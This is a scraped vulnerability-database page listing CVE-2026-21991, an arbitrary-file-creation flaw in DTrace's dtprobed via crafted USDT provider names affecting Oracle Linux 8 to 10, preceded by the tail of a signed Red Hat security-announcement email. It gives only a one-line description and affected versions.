v1\n\niQIVAwUBW8X6otzjgjWX9erEAQj5OQ/+O0GjLYqyc0dlDxIBFWYXEGkMxGpwpgR1\nHpF5FKVo32x78i8M/mQXTEtnwJxfGH+ABkYUPmiJxfyhKuuNptNEg/rD02HRjuC5\nGmZG8CEloGu8NGPu3CEEPrRpK2sqVf2F+KqM9MKjMr+++8DxwXy8eSOSDRI/yJyI\n/xQhUPPx7g+ZZuoXs5Fh6ckfuDIFwn3gT6tqmet59WcL5L1phr1grDyeP6NbrLLY\nUFEAbjs9x6TDnwbUM5DnDflBENhJElamSgClObp0UOa31FCI1okO8rW1qCL/HYhY\nz2avZB31qCwtCM/5nCg104+xKO3Bqz3QcCtkL4m7gRWmPvATpOUweI9ptYW69iwF\n2Bmr+25h2yVLvfAhqVvCGnRqAdPoSBYoasZR94oF9ctjOu66uWdT7h12oiPlFEFh\noZXfozGdb+HdX18/If/2vzPskuZ/EGwbOJn3IHSmuru2oIBHrIHZ5X3ke6gtHeIN\nPby2IS10QpCng48r+278ifFkPyG0Y1XmalapBHPadpWy3htPQEr9YmGehEGiyKMz\nhgD8rss/D7HTS/o+FGE8sE9yjEWpCbUcPWu5u7Rw8chAut8GHVHAvCRgCcUK5puo\nrmse06Ba+bjUh3OucXsHmsk8VQ+STC4xt1cTbnDTd1xELrH8J+qv8fGV84sdEAaj\nK3wXCIrtY5U=osL7\n-----END PGP SIGNATURE-----\n\n--\nRHSA-announce mailing list\nRHSA-announce@redhat.com\nhttps://www.redhat.com/mailman/listinfo/rhsa-announce\n",
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CVE-2026-21991 (GCVE-0-2026-21991)
Vulnerability from nvd – Published: 2026-03-16 21:36 – Updated: 2026-03-17 13:35- A DTrace component, dtprobed, allows arbitrary file creation through crafted USDT provider names.
| URL | Tags | ||||
|---|---|---|---|---|---|
|
|||||
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Oracle Corporation | Oracle Linux |
Affected:
8
Affected: 9 Affected: 10 |
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CVE-2026-21991 (GCVE-0-2026-21991)
Vulnerability from cvelistv5 – Published: 2026-03-16 21:36 – Updated: 2026-03-17 13:35- A DTrace component, dtprobed, allows arbitrary file creation through crafted USDT provider names.
| URL | Tags | ||||
|---|---|---|---|---|---|
|
|||||
| Vendor | Product | Version | ||
|---|---|---|---|---|
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Affected:
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Affected: 9 Affected: 10 |
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